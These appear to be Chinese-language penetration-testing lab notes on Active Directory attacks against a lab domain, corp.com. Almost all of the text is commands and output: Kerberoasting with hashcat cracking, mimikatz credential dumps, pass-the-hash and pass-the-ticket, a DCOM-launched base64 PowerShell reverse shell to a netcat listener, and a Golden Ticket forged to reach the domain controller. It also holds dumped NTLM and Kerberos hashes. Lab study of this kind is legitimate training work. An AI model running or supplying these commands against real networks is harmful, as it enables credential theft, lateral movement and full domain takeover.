【Windows】登入方法
密碼
取得方法:
- 密碼噴灑
- crackmapexe
- hash破解
# impacket-GetUserSPNs => Kerberoasting攻擊 取得hash
# hashcat 破解
sudo impacket-GetUserSPNs -request -dc-ip 192.168.198.70 corp.com/meg
http/files04.corp.com backupuser CN=Domain Admins,CN=Users,DC=corp,DC=com 2023-12-11 10:36:14.564895 <never>
...
[-] CCache file is not found. Skipping...
$krb5tgs$23$*backupuser$CORP.COM$corp.com/backupuser*$096b74a0a8eadb71d68c1d148eeb9dda$4b0294e2de695f87fa4a024eefafc6ef689ef17e2662f3884c68ebc7cb19f15fe2e82264fa4eb1987584b296426d085463faf4bacf97d70e247449159353d5803fbefdf64734bb42e06a1de083ca392fd5325c42bc1ec23f7781c341f143ce5872ee1b6fcb1eda292514b687b7f36fe97b6d8dbb00060264af8efc7a027470fac2bc480a540b4d282d7a6fd92ebb177941170bde251871b162c7cb52423e5a3265e84fdd9354f42754f4969ac790189cd10e3884ed3f7ddef68ea5e1f8339b06d4ff4f504012f9bfc904d4c27bec891141e473c6b1240433233a5dac4943df3440a4761381e705a4f5cb91924e12322c7dd975734f200ab2609edf9996f77b1c2e121578db8e0e217b539badf48cecc15f3a4ce093af2ca2d6b2ec225586166b77d77a4a3885dace734e7b1447ba68e4e62b1c8bfd50364a73a9e7c38c4b665657417cb7df49482bf4c17429b0b0737e13f3da403be9133a2e98d32a9537bed14c146715a34f415e71c28684d8c6afcd022e61daa0d6d1c93e030f7f90043ad84b616ca46a10a883b3a5fa01dc1eb215806a35ba1f5d8f9cfeb3fe5ca1e03d6478127b45d165d9b4a598d9d29c97e33895dcbf3844ca5faa38a4ba4b19b4a268f21a44e6f40bb7fa9e0b1a481f29f42bdd60df61609755b7f1da9c75ff6685005ce2882b9a0b98d0781eca0f560545180f01c63611c57b47bd222721a5465b95823bf2a8da33115ca52bea80004367694e9e23738300e5bb5294da55846ddc1f3ebd3e3d13ec932a1c7fa8b439d3c452d7899c1fae03ae8078a25c2f61ec91bdbefdd08687636bd45497393249470e4b2ec2ac2877bf57648a06ba432fac6a9995bc53dc8e8e5cebd49bfec93bd4f6e5e2c7639f4310c7e0ea348c3cadf7a5b443a52a53957d04d1bdf30370983f21e2306869a7db7abc13df9416df85eb85e71a0669c8cb2d4ee9a9030eac5c421f0108d8ba763f3102e57d5a220f2bda97693cd1493c9f494298d7ca057fe39bc2ee1213990b8b00bbe1f076d852f171a18a7e5c496b963c61e4c63b7197e0e7500afeaf192e6d84f2694e83df5aef914452bbbc5387cefc0ac906d8a1f11258f89a8bd3651bd5a0ed2e2609f22ee825646e422826413030318cb29df4b04a66b50e2f519007e36942049034e30b13c5d96662a846fe56f524066bedadf246ce6a4a3d1453b664a5dbae36bf5b8361b6a7b7540fb8154404f8c677b70c0b89769293aa5915e77efa1c2c0318bf55755a493e32487a7e37b676b661209aa47f85e9e482072cfbaf18485322b475f0
...
hash -> hashes.kerberoast3
...
sudo hashcat -m 13100 hashes.kerberoast3 /usr/share/wordlists/rockyou.txt -r demo.rule --force
NTLM
取得方法:
mimikatz.exe + impacket-wmiexec
C:\tools\mimikatz.exe
privilege::debug
lsadump::dcsync /user:corp\Administrator
impacket-wmiexec -hashes :2892d26cdf84d7a70e2eb3b9f05c425e Administrator@192.168.233.70NTLM (沒有admin 找 同等權限帳號)
C:\tools\mimikatz.exe
privilege::debug
sekurlsa::logonpasswordsAuthentication Id : 0 ; 2421341 (00000000:0024f25d)
Session : RemoteInteractive from 2
User Name : offsec
Domain : CLIENT74
Logon Server : CLIENT74
Logon Time : 2/20/2024 3:50:48 AM
SID : S-1-5-21-4060895957-195960390-4124122524-1001
msv :
[00000003] Primary
* Username : offsec
* Domain : CLIENT74
* NTLM : 2892d26cdf84d7a70e2eb3b9f05c425e
* SHA1 : a188967ac5edb88eca3301f93f756ca8e94013a3
tspkg :
wdigest :
* Username : offsec
* Domain : CLIENT74
* Password : (null)
kerberos :
* Username : offsec
* Domain : CLIENT74
* Password : (null)/usr/bin/impacket-wmiexec -hashes :2892d26cdf84d7a70e2eb3b9f05c425e Administrator@192.168.233.72
Impacket v0.11.0 - Copyright 2023 Fortra
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>
...登入NTLM(pth)
C:\tools\mimikatz.exe
privilege::debug
sekurlsa::logonpasswordsAuthentication Id : 0 ; 1044456 (00000000:000fefe8)
Session : RemoteInteractive from 2
User Name : offsec
Domain : CLIENT76
Logon Server : CLIENT76
Logon Time : 2/20/2024 7:33:53 AM
SID : S-1-5-21-1798880304-3042387037-2047428623-1001
msv :
[00000003] Primary
* Username : offsec
* Domain : CLIENT76
* NTLM : 2892d26cdf84d7a70e2eb3b9f05c425e
* SHA1 : a188967ac5edb88eca3301f93f756ca8e94013a3
tspkg :
wdigest :
* Username : offsec
* Domain : CLIENT76
* Password : (null)
kerberos :
* Username : offsec
* Domain : CLIENT76
* Password : (null)
ssp :
credman :mimikatz # sekurlsa::pth /user:Administrator /domain:corp.com /ntlm:2892d26cdf84d7a70e2eb3b9f05c425e /run:powershell
user : Administrator
domain : corp.com
program : powershell
impers. : no
NTLM : 2892d26cdf84d7a70e2eb3b9f05c425e
| PID 4432
| TID 4276
| LSA Process is now R/W
| LUID 0 ; 1854542 (00000000:001c4c4e)
\_ msv1_0 - data copy @ 00000243D6EF4280 : OK !
\_ kerberos - data copy @ 00000243D6FA2B78
\_ aes256_hmac -> null
\_ aes128_hmac -> null
\_ rc4_hmac_nt OK
\_ rc4_hmac_old OK
\_ rc4_md4 OK
\_ rc4_hmac_nt_exp OK
\_ rc4_hmac_old_exp OK
\_ *Password replace @ 00000243D6FBE418 (32) -> null
# 使用administraotr 開新powershellPS C:\Windows\system32> whoami
client76\offsec
# 雖然還是offsec,但以切換admin hash
PS C:\Windows\system32> klist
Current LogonId is 0:0x1c4c4e
# no tickets
Cached Tickets: (0)
# 連線 web04
PS C:\Windows\system32> net use \\web04
The command completed successfully.
# 有 2 tickets
PS C:\Windows\system32> klist
Current LogonId is 0:0x1c4c4e
Cached Tickets: (2)
#0> Client: Administrator @ CORP.COM
Server: krbtgt/CORP.COM @ CORP.COM
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
Start Time: 12/10/2023 10:52:33 (local)
End Time: 12/10/2023 20:52:33 (local)
Renew Time: 12/17/2023 10:52:33 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0x1 -> PRIMARY
Kdc Called: DC1.corp.com
#1> Client: Administrator @ CORP.COM
Server: cifs/web04 @ CORP.COM
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
Start Time: 12/10/2023 10:52:33 (local)
End Time: 12/10/2023 20:52:33 (local)
Renew Time: 12/17/2023 10:52:33 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called: DC1.corp.com
# 使用 PsExec.exe 連線 web04
PS C:\Windows\system32> C:\tools\SysinternalsSuite\PsExec.exe \\web04 cmd
PsExec v2.4 - Execute processes remotely
Copyright (C) 2001-2022 Mark Russinovich
Sysinternals - www.sysinternals.com
# 移動到web04
Microsoft Windows [Version 10.0.20348.887]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
corp\administrator
C:\Windows\system32>
# .... 橫移成功 do somethingPass The Ticket (ptt)
# ticket 會放置在目前目錄
cd c:\tools
C:\tools\mimikatz.exe
privilege::debug
sekurlsa::tickets /export
# 回到mimikatz,使用以下指令攻擊,成功注入#
mimikatz # kerberos::ptt [0;104678]-0-0-40810000-dave@cifs-web04.kirbi
* File: '[0;104678]-0-0-40810000-dave@cifs-web04.kirbi': OK
PS C:\Windows\system32> klist
Current LogonId is 0:0xb8f86
Cached Tickets: (1)
#0> Client: dave @ CORP.COM
Server: cifs/web04 @ CORP.COM
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40810000 -> forwardable renewable name_canonicalize
Start Time: 12/10/2023 11:01:33 (local)
End Time: 12/10/2023 21:01:32 (local)
Renew Time: 12/17/2023 11:01:32 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:
# 利用SMB查詢
PS C:\Windows\system32> ls \\web04\backup
Directory: \\web04\backup
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/13/2022 5:52 AM 0 backup_schemata.txt
-a---- 12/10/2023 11:01 AM 78 flag.txt
# 取得flag
PS C:\Windows\system32> type \\web04\backup\flag.txtDCOM
# kali
nc -lnvp 443
listening on [any] 443 ...# 連到目標機呼叫kali反向shell
PS C:\Users\jen\Desktop> $dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","192.168.248.72"))
# powershell ... 編碼base64反向shell
PS C:\Users\jen\Desktop> $dcom.Document.ActiveView.ExecuteShellCommand("powershell",$null,"powershell -nop -w hidden -e JABjAGwAaQBlAG4
AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBl.....",Golden Ticket
sid + krbtgt的NTLM Hash
C:\tools\mimikatz.exe
mimikatz # privilege::debug
mimikatz # lsadump::lsa /patch
# sid
Domain : CORP / S-1-5-21-1987370270-658905905-1781884369
RID : 000001f6 (502)
# krbtgt
User : krbtgt
LM :
# krbtgt ntlm
NTLM : 1693c6cefafffc7af11ef34d1c788f47到中繼機器
# 彈出新powershell(管理者執行)
PS C:\Users\jen> Start-Process powershell -Verb runAs
PS C:\Windows\system32> cd C:\Tools
PS C:\Tools> .\mimikatz.exe
...省略
# 清除ticket
mimikatz # kerberos::purge
Ticket(s) purge for current session is OK
# kerberos::golden /user:{username} /domain:corp.com /sid:{sid} /krbtgt:{krbtgt ntlm} /ptt
mimikatz # kerberos::golden /user:jen /domain:corp.com /sid:S-1-5-21-1987370270-658905905-1781884369 /krbtgt:1693c6cefafffc7af11ef34d1c788f47 /ptt
User : jen
Domain : corp.com (CORP)
SID : S-1-5-21-1987370270-658905905-1781884369
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: 1693c6cefafffc7af11ef34d1c788f47 - rc4_hmac_nt
Lifetime : 12/10/2023 8:54:47 AM ; 12/7/2033 8:54:47 AM ; 12/7/2033 8:54:47 AM
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'jen @ corp.com' successfully submitted for current session
# 啟用cmd
mimikatz # misc::cmd
Patch OK for 'cmd.exe' from 'DisableCMD' to 'KiwiAndCMD' @ 00007FF71995B800
####### 離開後連到 dc1 執行 cmd
C:\Tools>cd C:\Tools\SysinternalsSuite
C:\Tools\SysinternalsSuite>.\PsExec.exe \\DC1 cmd.exe